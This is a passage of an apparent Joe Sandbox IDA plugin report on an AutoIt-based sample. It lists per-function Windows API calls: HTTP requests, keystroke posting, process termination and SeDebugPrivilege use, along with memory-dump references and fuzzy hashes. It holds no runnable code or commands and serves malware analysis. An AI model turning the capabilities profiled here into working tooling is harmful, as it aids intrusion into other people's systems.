                                                                                                                                          • Part of subcall function 00B25D0A: ScreenToClient.USER32(?,?), ref: 00B25D99
                                                                                                                                        • GetDC.USER32 ref: 00B646F5
                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B64708
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B64716
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B6472B
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B64733
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B647C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                        • Opcode ID: c8428015ffaaec29e377c0aa89222f7f83f7cc84df94917f896094817c12f388
                                                                                                                                        • Instruction ID: ced816e467d269a8bf2cca62d787d12f257d15ca86d9773ddd89090cdb0e4a75
                                                                                                                                        • Opcode Fuzzy Hash: c8428015ffaaec29e377c0aa89222f7f83f7cc84df94917f896094817c12f388
                                                                                                                                        • Instruction Fuzzy Hash: 4371CD30400A05EFCF218F64C984ABA3BF5FF4A360F1442E9E9565B2A6D7789C41DF60
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00B935E4
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • LoadStringW.USER32(00BF2390,?,00000FFF,?), ref: 00B9360A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString$_wcslen
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 4099089115-2391861430
                                                                                                                                        • Opcode ID: b0a3e61cb87ed9154a97bd0fdd935d6a4b7ea1bae34e0f8b17ea2bbcd7d43fce
                                                                                                                                        • Instruction ID: 3b95df159a61f1a3153312da8a0bb305535eaa82ed3f95de150a40e04269d134
                                                                                                                                        • Opcode Fuzzy Hash: b0a3e61cb87ed9154a97bd0fdd935d6a4b7ea1bae34e0f8b17ea2bbcd7d43fce
                                                                                                                                        • Instruction Fuzzy Hash: 19515C7180021ABBCF15EBA0DC42EEDBBF8EF14740F1845A5F109721A1EB311A98DBA4
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9C272
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B9C29A
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B9C2CA
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B9C322
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 00B9C336
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9C341
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                                        • Opcode ID: 8c9e22ae65a5ff9f2b5d9df8f484179f212585e37a13ed58a46bb5fb906eb591
                                                                                                                                        • Instruction ID: 549a6173be1bec46f6042967e033a5a81a522cd068d50a7a48f9d24fef2b02d9
                                                                                                                                        • Opcode Fuzzy Hash: 8c9e22ae65a5ff9f2b5d9df8f484179f212585e37a13ed58a46bb5fb906eb591
                                                                                                                                        • Instruction Fuzzy Hash: F4317AB1604608AFDB21DFA58C88AAB7FFCEB49744B10866EF48693200DB70DD049B65
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B63AAF,?,?,Bad directive syntax error,00BBCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B898BC
                                                                                                                                        • LoadStringW.USER32(00000000,?,00B63AAF,?), ref: 00B898C3
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B89987
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                                        • Opcode ID: 386f1a58104b2ab1f8985d4f68528d3e760fb66120a10b9e5a50cef351baec39
                                                                                                                                        • Instruction ID: 105021a613c21dc1ca7b89ca563a5015616533822b86c3b7c1af11e25d70a626
                                                                                                                                        • Opcode Fuzzy Hash: 386f1a58104b2ab1f8985d4f68528d3e760fb66120a10b9e5a50cef351baec39
                                                                                                                                        • Instruction Fuzzy Hash: 8C215E31C0021AABCF15EF90DC06EFE77B5FF28740F0848A5F519660A2EB759A58DB50
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32 ref: 00B820AB
                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00B820C0
                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B8214D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                        • API String ID: 1290815626-3381328864
                                                                                                                                        • Opcode ID: 69ed6a6cb728dd5e4c725126b0852041ab93e7155b19a623931871a16062d1f2
                                                                                                                                        • Instruction ID: 211875cd1a2a00ec0279f4a578dacde9bbbb9b222821b1f49c60699a78635d41
                                                                                                                                        • Opcode Fuzzy Hash: 69ed6a6cb728dd5e4c725126b0852041ab93e7155b19a623931871a16062d1f2
                                                                                                                                        • Instruction Fuzzy Hash: 8A110676688706BAFA117731DC0ADA637DCDB04328B3001E6FB05B60F1FFA1A911A715
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 30becefb4b1f8e1227fce567c417b99b9a09db833e84dfd4626be47252c22b17
                                                                                                                                        • Instruction ID: 99a4dbd513cf00533d5ba36642f6b62dc6289091e9305379ef18fb436fde4a09
                                                                                                                                        • Opcode Fuzzy Hash: 30becefb4b1f8e1227fce567c417b99b9a09db833e84dfd4626be47252c22b17
                                                                                                                                        • Instruction Fuzzy Hash: 54C1BE74904249EFDF11EFA8C885BADBBF0AF09311F0845D9F915A7392CB709A49CB61
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1282221369-0
                                                                                                                                        • Opcode ID: 31712fe890aec1f2695a2d924bd8fb8647ed625ae5f8879f49599f1f6b62408a
                                                                                                                                        • Instruction ID: 2b308f0447c8200690cbc9ba124354438ea14c67239b906bdf6283a70b9660b5
                                                                                                                                        • Opcode Fuzzy Hash: 31712fe890aec1f2695a2d924bd8fb8647ed625ae5f8879f49599f1f6b62408a
                                                                                                                                        • Instruction Fuzzy Hash: 5261E371905311AFDB21AFB89891BAA7FE6EF05312F0442FDFD44A7292DA31990DC790
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00BB5186
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00BB51C7
                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00BB51CD
                                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00BB51D1
                                                                                                                                          • Part of subcall function 00BB6FBA: DeleteObject.GDI32(00000000), ref: 00BB6FE6
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB520D
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB521A
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BB524D
                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00BB5287
                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00BB5296
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3210457359-0
                                                                                                                                        • Opcode ID: aeb300e909d375ac79fb3729cea8c56b9d926a68551a58abe01483f5cd8db2fd
                                                                                                                                        • Instruction ID: f579e7ddb16e68e66d12e8a7fda3de5fca6ce8034b0478cff43ac696525a16ba
                                                                                                                                        • Opcode Fuzzy Hash: aeb300e909d375ac79fb3729cea8c56b9d926a68551a58abe01483f5cd8db2fd
                                                                                                                                        • Instruction Fuzzy Hash: 0C517130A52A08BFEF349F28DC46BF93BE5EB05321F144192F515A62E0C7F5A990DB42
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B76890
                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B768A9
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B768B9
                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B768D1
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B768F2
                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B38874,00000000,00000000,00000000,000000FF,00000000), ref: 00B76901
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B7691E
                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B38874,00000000,00000000,00000000,000000FF,00000000), ref: 00B7692D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1268354404-0
                                                                                                                                        • Opcode ID: 1788d74199250dac05a78af3498d74055207416b2e3584753e41a5e4c54618cf
                                                                                                                                        • Instruction ID: f1d132fe926b67ed00dae8023c9b8e18535708feb6d2157e90ab0a33bd721019
                                                                                                                                        • Opcode Fuzzy Hash: 1788d74199250dac05a78af3498d74055207416b2e3584753e41a5e4c54618cf
                                                                                                                                        • Instruction Fuzzy Hash: DB517A7060070AEFDB20CF24CC95FAA7BF5EB58750F208658F956972A0EBB1E950DB50
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B9C182
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B9C195
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 00B9C1A9
                                                                                                                                          • Part of subcall function 00B9C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9C272
                                                                                                                                          • Part of subcall function 00B9C253: GetLastError.KERNEL32 ref: 00B9C322
                                                                                                                                          • Part of subcall function 00B9C253: SetEvent.KERNEL32(?), ref: 00B9C336
                                                                                                                                          • Part of subcall function 00B9C253: InternetCloseHandle.WININET(00000000), ref: 00B9C341
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 337547030-0
                                                                                                                                        • Opcode ID: 8642427f0eaa91e8c242ea2d06bbb99c74490b54a863a86bc44394763786a92d
                                                                                                                                        • Instruction ID: ba66bf3cbcc726ac8e8ba06bfa36e51b2cc4c38f484e0f925b2029fa4fb6c975
                                                                                                                                        • Opcode Fuzzy Hash: 8642427f0eaa91e8c242ea2d06bbb99c74490b54a863a86bc44394763786a92d
                                                                                                                                        • Instruction Fuzzy Hash: 52319A71200701AFDF219FA5DC44A6ABFF8FF58300B10856EF95A83610DB70E814EBA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83A57
                                                                                                                                          • Part of subcall function 00B83A3D: GetCurrentThreadId.KERNEL32 ref: 00B83A5E
                                                                                                                                          • Part of subcall function 00B83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B825B3), ref: 00B83A65
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B825BD
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B825DB
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B825DF
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B825E9
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B82601
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B82605
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8260F
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B82623
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B82627
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                        • Opcode ID: 33e2c5761a6d93bb064a9caba81b2b91c0dbb3e6f07b9d7d45af079ac777dc42
                                                                                                                                        • Instruction ID: 6c21ef0dcaa6204386ebbbf7965e335af039c3efb6a7ee5d49d5d26b6906205b
                                                                                                                                        • Opcode Fuzzy Hash: 33e2c5761a6d93bb064a9caba81b2b91c0dbb3e6f07b9d7d45af079ac777dc42
                                                                                                                                        • Instruction Fuzzy Hash: 4A01B170290210BBFB10A7689C8AF593F99DB4EB12F200102F358BF0E1CDF22444CA69
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B81449,?,?,00000000), ref: 00B8180C
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00B81449,?,?,00000000), ref: 00B81813
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B81449,?,?,00000000), ref: 00B81828
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00B81449,?,?,00000000), ref: 00B81830
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00B81449,?,?,00000000), ref: 00B81833
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B81449,?,?,00000000), ref: 00B81843
                                                                                                                                        • GetCurrentProcess.KERNEL32(00B81449,00000000,?,00B81449,?,?,00000000), ref: 00B8184B
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00B81449,?,?,00000000), ref: 00B8184E
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00B81874,00000000,00000000,00000000), ref: 00B81868
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                        • Opcode ID: ad922dcf56941f90757f78b3db74ddc90940831c81337fffdafd85af28db2f66
                                                                                                                                        • Instruction ID: 6dd34e7f8cde7bf0518d5d52d206f0fbb5e846776c428c234f3a66b3b5d96853
                                                                                                                                        • Opcode Fuzzy Hash: ad922dcf56941f90757f78b3db74ddc90940831c81337fffdafd85af28db2f66
                                                                                                                                        • Instruction Fuzzy Hash: 1501ACB5240304BFE610EFA9DC49F573BACEB89B11F504511FA05EB1A1CAB0D800CB20
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B8D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B8D501
                                                                                                                                          • Part of subcall function 00B8D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B8D50F
                                                                                                                                          • Part of subcall function 00B8D4DC: CloseHandle.KERNEL32(00000000), ref: 00B8D5DC
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAA16D
                                                                                                                                        • GetLastError.KERNEL32 ref: 00BAA180
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BAA1B3
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BAA268
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00BAA273
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAA2C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                        • Opcode ID: 1f8fe8e31967ca35fc418d986435918a527e7817fdc5737bdbaddb21e5400666
                                                                                                                                        • Instruction ID: 77c4e47545413b1ca29e799248acaaf0b952de25c33a85771ff1918fa1d5ad7b
                                                                                                                                        • Opcode Fuzzy Hash: 1f8fe8e31967ca35fc418d986435918a527e7817fdc5737bdbaddb21e5400666
                                                                                                                                        • Instruction Fuzzy Hash: 86616C70208242AFD720DF18C494F1ABBE5AF45318F1484DCE45A5B7A2C772EC49CBA2
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BB3925
